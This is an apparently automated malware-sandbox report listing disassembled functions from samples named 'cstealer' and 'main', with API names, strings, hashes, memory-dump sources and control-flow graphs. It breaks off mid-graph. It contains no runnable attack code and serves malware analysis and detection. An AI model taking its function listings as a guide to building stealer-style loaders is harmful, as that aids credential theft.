                                                                                                                                                            Function 0000014E712926F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                            • String ID: U
                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                            • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                            • Instruction ID: 8775f0db9867f8b990bb564de76d7655600c78e4319173f79116c575a70a0818
                                                                                                                                                            • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                            • Instruction Fuzzy Hash: 94417F32715B8086EB209F29E8443EAB7E2F7987A5F514421EF4D977A8EB3CC441D790
                                                                                                                                                            Function 0000014E712894A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                            • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                            • Instruction ID: aaa63442e8570d087d97b66993f6ecc1aa63d4f05a5615e03cbe1920e9e07c05
                                                                                                                                                            • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                            • Instruction Fuzzy Hash: AC114C32214B8082EB618F19F440399B7E6FB88BA5F684220EF8C07B68DF3CC551DB44
                                                                                                                                                            Function 0000014E71257356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __std_exception_copy
                                                                                                                                                            • String ID: ierarchy Descriptor'$riptor at (
                                                                                                                                                            • API String ID: 592178966-758928094
                                                                                                                                                            • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                                                            • Instruction ID: 463764bec2ef58ae87d92a348bc36ddb87ab223cec94856b0e0fd196988065e4
                                                                                                                                                            • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                                                            • Instruction Fuzzy Hash: B5E08671651B8490DF058F22E8812D873E1EB59BB4B4891229A5C06365FA38D1F9D340
                                                                                                                                                            Function 0000014E712573B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __std_exception_copy
                                                                                                                                                            • String ID: Locator'$riptor at (
                                                                                                                                                            • API String ID: 592178966-4215709766
                                                                                                                                                            • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                                                            • Instruction ID: 57508c63f539843ee7f5ef32701768ac306e16f0f38bcc46c9aba9db5aeced0a
                                                                                                                                                            • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                                                            • Instruction Fuzzy Hash: 1EE08671611B8480DF058F21D4812D8B3A1F759BA4B889122CA4C06365FA38D1E5D340
                                                                                                                                                            Function 0000014E71281BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 756756679-0
                                                                                                                                                            • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                            • Instruction ID: 8dda2a4e53c2db225312249758e77918bd949882e7ddcf4e576b0143183d4cd1
                                                                                                                                                            • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                            • Instruction Fuzzy Hash: 87115135701B8485EB54DBAAA4042A9B7E2FB89FE2F184025DF4D577B5DF38C442E380
                                                                                                                                                            Function 0000014E71281268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$AllocProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1617791916-0
                                                                                                                                                            • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                            • Instruction ID: 343b61533e16397f4571d681332592e41e582bd085240413369920d3bfdaa2c6
                                                                                                                                                            • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                            • Instruction Fuzzy Hash: DCE06DB560174486EB048F66D80838AB6E2FB89F66F04C424CA0907371DF7DC499D790

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 00007FF8A8F28610 Relevance: 6.9, APIs: 4, Instructions: 893librarymemoryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223141429.00007FF8A8F28000.00000080.00000001.01000000.0000001A.sdmp, Offset: 00007FF8A8950000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2222072647.00007FF8A8950000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8951000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8BEA000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8C64000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8CA6000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8CCB000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8D65000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8D68000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8E70000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8EB0000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8EBA000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8F1C000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223199273.00007FF8A8F2A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8a8950000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3300690313-0
                                                                                                                                                            • Opcode ID: 438a066e7f02bf6167b00439c69f910427746ba9370289bb30125fdead0934cc
                                                                                                                                                            • Instruction ID: f1256c6b2f126d472d8da2b57a6ea5c00f85ce7e2423ee4bdc7cbb3943cdd420
                                                                                                                                                            • Opcode Fuzzy Hash: 438a066e7f02bf6167b00439c69f910427746ba9370289bb30125fdead0934cc
                                                                                                                                                            • Instruction Fuzzy Hash: 0362333262919696E719CE38E8002BD76A0FB587D5F045132EA9EC37C8FB3CEA55C714

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Function 00007FF8BA248E24 Relevance: 58.1, APIs: 4, Strings: 29, Instructions: 380COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 475 7ff8ba248e24-7ff8ba248e55 476 7ff8ba2493e8-7ff8ba2493fa 475->476 477 7ff8ba248e5b-7ff8ba248e7a 475->477 478 7ff8ba2493fd-7ff8ba249400 call 7ff8ba247454 476->478 479 7ff8ba248f95-7ff8ba248f98 477->479 480 7ff8ba248e80 477->480 490 7ff8ba249405-7ff8ba249421 478->490 482 7ff8ba248fcf-7ff8ba248fe5 479->482 483 7ff8ba248f9a-7ff8ba248fbe call 7ff8ba24a3cc 479->483 484 7ff8ba248e86-7ff8ba248e89 480->484 485 7ff8ba248f83-7ff8ba248f90 480->485 488 7ff8ba2490fc-7ff8ba2490ff 482->488 489 7ff8ba248feb 482->489 505 7ff8ba24932b-7ff8ba24932f 483->505 506 7ff8ba248fc4-7ff8ba248fca 483->506 486 7ff8ba248e8b 484->486 487 7ff8ba248f01-7ff8ba248f06 484->487 491 7ff8ba249322-7ff8ba249326 call 7ff8ba246fb4 485->491 493 7ff8ba248e8d-7ff8ba248e90 486->493 494 7ff8ba248eb9-7ff8ba248ec6 486->494 498 7ff8ba248f08-7ff8ba248f0b 487->498 499 7ff8ba248f71-7ff8ba248f7e 487->499 500 7ff8ba24927c-7ff8ba24927f 488->500 501 7ff8ba249105 488->501 495 7ff8ba2490ea-7ff8ba2490f7 489->495 496 7ff8ba248ff1-7ff8ba248ff4 489->496 491->505 507 7ff8ba248eef-7ff8ba248efc 493->507 508 7ff8ba248e92-7ff8ba248e95 493->508 494->491 495->491 511 7ff8ba248ffa 496->511 512 7ff8ba2490a3-7ff8ba2490a6 496->512 513 7ff8ba248f0d-7ff8ba248f10 498->513 514 7ff8ba248f44-7ff8ba248f6c call 7ff8ba2474d8 498->514 499->491 509 7ff8ba249315 500->509 510 7ff8ba249285-7ff8ba249288 500->510 503 7ff8ba24926a-7ff8ba249277 501->503 504 7ff8ba24910b-7ff8ba24910e 501->504 503->491 517 7ff8ba249167 504->517 518 7ff8ba249110-7ff8ba249113 504->518 525 7ff8ba24935f-7ff8ba249366 505->525 526 7ff8ba249331-7ff8ba249337 505->526 506->490 507->491 508->507 520 7ff8ba248e97-7ff8ba248e9a 508->520 519 7ff8ba24931c 509->519 521 7ff8ba2492bd-7ff8ba249313 call 7ff8ba24be30 call 7ff8ba2471a4 call 7ff8ba247454 510->521 522 7ff8ba24928a-7ff8ba24928d 510->522 523 7ff8ba2490db-7ff8ba2490e5 511->523 524 7ff8ba249000-7ff8ba249003 511->524 512->523 527 7ff8ba2490a8-7ff8ba2490ab 512->527 515 7ff8ba248f2e-7ff8ba248f3f call 7ff8ba246fb4 513->515 516 7ff8ba248f12-7ff8ba248f15 513->516 514->505 515->514 538 7ff8ba248f26-7ff8ba248f29 516->538 539 7ff8ba248f17-7ff8ba248f1a 516->539 536 7ff8ba24916c-7ff8ba249183 517->536 529 7ff8ba249155-7ff8ba249162 518->529 530 7ff8ba249115-7ff8ba249118 518->530 519->491 520->507 531 7ff8ba248e9c-7ff8ba248e9f 520->531 521->505 532 7ff8ba24928f-7ff8ba249292 522->532 533 7ff8ba2492b1-7ff8ba2492bb 522->533 523->491 534 7ff8ba249089-7ff8ba24909e call 7ff8ba2473b8 524->534 535 7ff8ba249009-7ff8ba24900c 524->535 546 7ff8ba24936d-7ff8ba2493a2 call 7ff8ba2471a4 call 7ff8ba247454 525->546 541 7ff8ba24934f-7ff8ba24935d 526->541 542 7ff8ba249339-7ff8ba24933d 526->542 543 7ff8ba2490cc-7ff8ba2490d6 527->543 544 7ff8ba2490ad-7ff8ba2490b0 527->544 529->491 547 7ff8ba24911a-7ff8ba24911d 530->547 548 7ff8ba249146-7ff8ba249150 530->548 549 7ff8ba248edd-7ff8ba248eea 531->549 550 7ff8ba248ea1-7ff8ba248ea4 531->550 551 7ff8ba249294-7ff8ba249297 532->551 552 7ff8ba2492a5 532->552 533->491 534->505 553 7ff8ba24900e-7ff8ba249011 535->553 554 7ff8ba249047-7ff8ba249084 call 7ff8ba248e24 call 7ff8ba2471a4 535->554 555 7ff8ba2491e4-7ff8ba2491e7 536->555 556 7ff8ba249185-7ff8ba2491a8 call 7ff8ba24c2b4 536->556 538->536 539->538 558 7ff8ba248f1c-7ff8ba248f1f 539->558 541->546 560 7ff8ba24933f-7ff8ba249347 542->560 561 7ff8ba2493a5-7ff8ba2493a8 542->561 543->491 544->543 562 7ff8ba2490b2-7ff8ba2490b5 544->562 546->561 566 7ff8ba24911f-7ff8ba249122 547->566 567 7ff8ba249134-7ff8ba249141 547->567 548->491 549->491 550->549 568 7ff8ba248ea6-7ff8ba248ea9 550->568 551->552 569 7ff8ba249299-7ff8ba2492a3 551->569 552->533 570 7ff8ba249035-7ff8ba249042 553->570 571 7ff8ba249013-7ff8ba249016 553->571 554->478 575 7ff8ba24924f-7ff8ba249265 call 7ff8ba24c2b4 555->575 576 7ff8ba2491e9-7ff8ba2491f1 555->576 600 7ff8ba2491aa-7ff8ba2491d2 call 7ff8ba2474d8 556->600 601 7ff8ba2491d5-7ff8ba2491df 556->601 558->538 577 7ff8ba248f21-7ff8ba248f24 558->577 560->561 579 7ff8ba249349-7ff8ba24934d 560->579 564 7ff8ba2493d9-7ff8ba2493e6 561->564 565 7ff8ba2493aa-7ff8ba2493d4 call 7ff8ba2485ac call 7ff8ba247454 call 7ff8ba247558 561->565 580 7ff8ba2490b7-7ff8ba2490ba 562->580 581 7ff8ba2490c0-7ff8ba2490c7 562->581 564->490 565->564 566->569 584 7ff8ba249128-7ff8ba24912f 566->584 567->491 585 7ff8ba248ecb-7ff8ba248ed8 568->585 586 7ff8ba248eab-7ff8ba248eae 568->586 569->491 570->491 571->570 587 7ff8ba249018-7ff8ba24901b 571->587 575->490 591 7ff8ba249235-7ff8ba249237 576->591 592 7ff8ba2491f3-7ff8ba249209 call 7ff8ba246fb4 576->592 577->483 577->538 579->541 579->561 580->569 580->581 581->519 584->519 585->491 586->585 597 7ff8ba248eb0-7ff8ba248eb3 586->597 598 7ff8ba24901d-7ff8ba249020 587->598 599 7ff8ba249026-7ff8ba249030 587->599 591->575 605 7ff8ba249239-7ff8ba24924a call 7ff8ba246fb4 591->605 592->575 615 7ff8ba24920b-7ff8ba249233 call 7ff8ba2474d8 592->615 597->483 597->494 598->569 598->599 599->491 600->601 601->490 605->575 615->575
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                            • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                                                                                            • API String ID: 2943138195-1482988683
                                                                                                                                                            • Opcode ID: 8198320b206939844f23122dd5e90657888558fff071462cdecbe7f68ee38a4c
                                                                                                                                                            • Instruction ID: d8467c640b073ad24f348808adc1b0605217cc1621b309f08bc183a14ea13b13
                                                                                                                                                            • Opcode Fuzzy Hash: 8198320b206939844f23122dd5e90657888558fff071462cdecbe7f68ee38a4c
                                                                                                                                                            • Instruction Fuzzy Hash: 2F025A72E1865388FB28CB6CD8951BC2BB0BB05BC4F8451B9DF0D16A98DF2DE544E340
                                                                                                                                                            Function 00007FF8BA24C69C Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 289COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 815 7ff8ba24c69c-7ff8ba24c6d2 816 7ff8ba24c6d5-7ff8ba24c6df 815->816 817 7ff8ba24caae-7ff8ba24cab8 816->817 818 7ff8ba24c6e5-7ff8ba24c6ec 816->818 821 7ff8ba24cacc-7ff8ba24cacf 817->821 822 7ff8ba24caba-7ff8ba24cabd 817->822 819 7ff8ba24c6ee-7ff8ba24c6f5 818->819 820 7ff8ba24c6fb-7ff8ba24c6fe 818->820 819->820 823 7ff8ba24cb35-7ff8ba24cb54 819->823 824 7ff8ba24c77b-7ff8ba24c785 820->824 825 7ff8ba24c700-7ff8ba24c742 call 7ff8ba2471a4 call 7ff8ba247454 820->825 827 7ff8ba24cae0-7ff8ba24cb32 call 7ff8ba247428 call 7ff8ba247454 821->827 828 7ff8ba24cad1-7ff8ba24cade call 7ff8ba2473b8 821->828 822->823 826 7ff8ba24cabf-7ff8ba24caca 822->826 831 7ff8ba24ca7b-7ff8ba24ca89 call 7ff8ba24e600 824->831 832 7ff8ba24c78b-7ff8ba24c79c 824->832 825->824 857 7ff8ba24c744-7ff8ba24c778 call 7ff8ba2485ac call 7ff8ba247454 825->857 826->823 827->823 828->823 850 7ff8ba24ca8d-7ff8ba24ca93 call 7ff8ba247454 831->850 837 7ff8ba24ca56-7ff8ba24ca79 call 7ff8ba24e600 832->837 838 7ff8ba24c7a2-7ff8ba24c7a5 832->838 837->850 844 7ff8ba24c7ab-7ff8ba24c7ae 838->844 845 7ff8ba24c9e0-7ff8ba24ca49 call 7ff8ba2470f4 call 7ff8ba2471a4 call 7ff8ba247454 838->845 846 7ff8ba24c92e-7ff8ba24c935 844->846 847 7ff8ba24c7b4-7ff8ba24c7b7 844->847 869 7ff8ba24caa4-7ff8ba24caa8 845->869 892 7ff8ba24ca4b-7ff8ba24ca54 call 7ff8ba247674 845->892 854 7ff8ba24c98f-7ff8ba24c9db call 7ff8ba249f4c call 7ff8ba2485ac call 7ff8ba247454 call 7ff8ba247480 846->854 855 7ff8ba24c937-7ff8ba24c93b 846->855 847->845 853 7ff8ba24c7bd-7ff8ba24c7c0 847->853 862 7ff8ba24ca98-7ff8ba24caa1 850->862 859 7ff8ba24c8e9-7ff8ba24c929 call 7ff8ba24e600 call 7ff8ba247480 call 7ff8ba247454 853->859 860 7ff8ba24c7c6-7ff8ba24c7c9 853->860 854->850 855->854 861 7ff8ba24c93d-7ff8ba24c97d call 7ff8ba24b32c call 7ff8ba247454 855->861 857->824 859->862 866 7ff8ba24c7cb-7ff8ba24c7db call 7ff8ba24b0d4 860->866 867 7ff8ba24c7e0-7ff8ba24c7f3 860->867 861->869 897 7ff8ba24c983-7ff8ba24c98a 861->897 862->869 866->850 875 7ff8ba24c7f8-7ff8ba24c80d call 7ff8ba24e600 867->875 869->816 869->817 895 7ff8ba24c80f-7ff8ba24c812 875->895 896 7ff8ba24c868-7ff8ba24c873 875->896 892->869 902 7ff8ba24c858 895->902 903 7ff8ba24c814-7ff8ba24c856 call 7ff8ba247428 call 7ff8ba247454 895->903 901 7ff8ba24c878-7ff8ba24c87d 896->901 897->869 907 7ff8ba24c87f-7ff8ba24c889 901->907 908 7ff8ba24c8d9-7ff8ba24c8e4 901->908 905 7ff8ba24c85d-7ff8ba24c866 902->905 903->905 905->901 907->875 910 7ff8ba24c88f-7ff8ba24c8d4 call 7ff8ba2485ac call 7ff8ba247454 call 7ff8ba247480 907->910 908->869 910->897
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                            • String ID: `anonymous namespace'
                                                                                                                                                            • API String ID: 3863519203-3062148218
                                                                                                                                                            • Opcode ID: 0934691313692e0f7ca743a959aac5446240169abf1b8922f93b005b9bcd56c4
                                                                                                                                                            • Instruction ID: 781a46ac45301f92a69167545697144ad5286c2147c5f6e62f1975663d9b10e3
                                                                                                                                                            • Opcode Fuzzy Hash: 0934691313692e0f7ca743a959aac5446240169abf1b8922f93b005b9bcd56c4
                                                                                                                                                            • Instruction Fuzzy Hash: 08E14872A18B8299EB10CF2CD9801AD7BA0FB44B88F4491B6EF5D17B95DF38E554E700
                                                                                                                                                            Function 00007FF8BA24D4A0 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 356COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1197 7ff8ba24d4a0-7ff8ba24d4e9 1198 7ff8ba24d65c-7ff8ba24d65f 1197->1198 1199 7ff8ba24d4ef 1197->1199 1200 7ff8ba24d87b-7ff8ba24d87e 1198->1200 1201 7ff8ba24d665 1198->1201 1202 7ff8ba24d4f5-7ff8ba24d4f8 1199->1202 1203 7ff8ba24d6c0-7ff8ba24d6e4 call 7ff8ba2485ac 1199->1203 1207 7ff8ba24d899-7ff8ba24d89d 1200->1207 1208 7ff8ba24d880-7ff8ba24d883 1200->1208 1205 7ff8ba24d85d-7ff8ba24d86f call 7ff8ba24a234 1201->1205 1206 7ff8ba24d66b-7ff8ba24d66e 1201->1206 1209 7ff8ba24d4fe 1202->1209 1210 7ff8ba24d5f7-7ff8ba24d5fa 1202->1210 1228 7ff8ba24d6e6-7ff8ba24d6e9 1203->1228 1229 7ff8ba24d6f0-7ff8ba24d709 call 7ff8ba249f4c call 7ff8ba247558 1203->1229 1205->1200 1206->1203 1216 7ff8ba24d670-7ff8ba24d673 1206->1216 1211 7ff8ba24d8a1 1207->1211 1217 7ff8ba24d885-7ff8ba24d888 1208->1217 1218 7ff8ba24d8d3-7ff8ba24d8ea call 7ff8ba24cc98 1208->1218 1219 7ff8ba24d5ea-7ff8ba24d5f2 call 7ff8ba24b138 1209->1219 1220 7ff8ba24d504-7ff8ba24d506 1209->1220 1212 7ff8ba24d5fc-7ff8ba24d5ff 1210->1212 1213 7ff8ba24d64f-7ff8ba24d657 call 7ff8ba24e074 1210->1213 1223 7ff8ba24d8a4-7ff8ba24d8cc call 7ff8ba2501a0 1211->1223 1224 7ff8ba24d601-7ff8ba24d604 1212->1224 1225 7ff8ba24d642-7ff8ba24d64a call 7ff8ba24bd38 1212->1225 1213->1223 1216->1203 1231 7ff8ba24d675-7ff8ba24d678 1216->1231 1232 7ff8ba24d8cd-7ff8ba24d8d1 1217->1232 1233 7ff8ba24d88a-7ff8ba24d88d 1217->1233 1257 7ff8ba24d8ec-7ff8ba24d901 1218->1257 1258 7ff8ba24d904-7ff8ba24d920 atol 1218->1258 1219->1223 1221 7ff8ba24d5cc-7ff8ba24d5e5 1220->1221 1222 7ff8ba24d50c-7ff8ba24d50f 1220->1222 1221->1223 1235 7ff8ba24d5bf-7ff8ba24d5c7 call 7ff8ba24cc98 1222->1235 1236 7ff8ba24d515-7ff8ba24d518 1222->1236 1237 7ff8ba24d606-7ff8ba24d609 1224->1237 1238 7ff8ba24d633-7ff8ba24d63d call 7ff8ba24a9a0 1224->1238 1225->1223 1228->1229 1239 7ff8ba24d6eb-7ff8ba24d6ee 1228->1239 1251 7ff8ba24d752-7ff8ba24d755 1229->1251 1300 7ff8ba24d70b-7ff8ba24d70f 1229->1300 1231->1203 1246 7ff8ba24d67a-7ff8ba24d67d 1231->1246 1232->1211 1233->1218 1241 7ff8ba24d88f-7ff8ba24d892 1233->1241 1235->1223 1248 7ff8ba24d51a-7ff8ba24d51d 1236->1248 1249 7ff8ba24d554-7ff8ba24d557 1236->1249 1237->1238 1250 7ff8ba24d60b-7ff8ba24d60e 1237->1250 1238->1223 1239->1229 1239->1251 1241->1218 1254 7ff8ba24d894-7ff8ba24d897 1241->1254 1246->1203 1260 7ff8ba24d67f-7ff8ba24d682 1246->1260 1261 7ff8ba24d51f-7ff8ba24d522 1248->1261 1262 7ff8ba24d547-7ff8ba24d54f call 7ff8ba24e238 1248->1262 1267 7ff8ba24d58f-7ff8ba24d5ba call 7ff8ba2485ac call 7ff8ba249f4c call 7ff8ba247454 1249->1267 1268 7ff8ba24d559-7ff8ba24d58a call 7ff8ba2471a4 1249->1268 1263 7ff8ba24d626-7ff8ba24d62e call 7ff8ba24898c 1250->1263 1264 7ff8ba24d610-7ff8ba24d613 1250->1264 1269 7ff8ba24d7d5-7ff8ba24d7ee call 7ff8ba24cc98 call 7ff8ba247558 1251->1269 1270 7ff8ba24d757-7ff8ba24d75a 1251->1270 1254->1207 1254->1218 1257->1258 1274 7ff8ba24d951-7ff8ba24d97f call 7ff8ba24ec7c call 7ff8ba246e9c 1258->1274 1275 7ff8ba24d922-7ff8ba24d92c 1258->1275 1272 7ff8ba24d684-7ff8ba24d687 1260->1272 1273 7ff8ba24d6a0-7ff8ba24d6ad call 7ff8ba24d9f4 1260->1273 1277 7ff8ba24d53a-7ff8ba24d542 call 7ff8ba24cf38 1261->1277 1278 7ff8ba24d524-7ff8ba24d527 1261->1278 1262->1223 1263->1223 1264->1207 1280 7ff8ba24d619-7ff8ba24d621 call 7ff8ba249f4c 1264->1280 1267->1223 1268->1223 1305 7ff8ba24d837-7ff8ba24d847 call 7ff8ba24cc98 call 7ff8ba247558 1269->1305 1338 7ff8ba24d7f0-7ff8ba24d7f4 1269->1338 1288 7ff8ba24d75c-7ff8ba24d75f 1270->1288 1289 7ff8ba24d773-7ff8ba24d78c call 7ff8ba24cc98 call 7ff8ba247558 1270->1289 1272->1207 1290 7ff8ba24d68d-7ff8ba24d694 1272->1290 1273->1207 1309 7ff8ba24d6b3-7ff8ba24d6bb call 7ff8ba24d4a0 1273->1309 1335 7ff8ba24d9e8-7ff8ba24d9ef 1274->1335 1336 7ff8ba24d981-7ff8ba24d984 1274->1336 1275->1274 1291 7ff8ba24d92e-7ff8ba24d93c 1275->1291 1277->1223 1278->1207 1294 7ff8ba24d52d-7ff8ba24d535 call 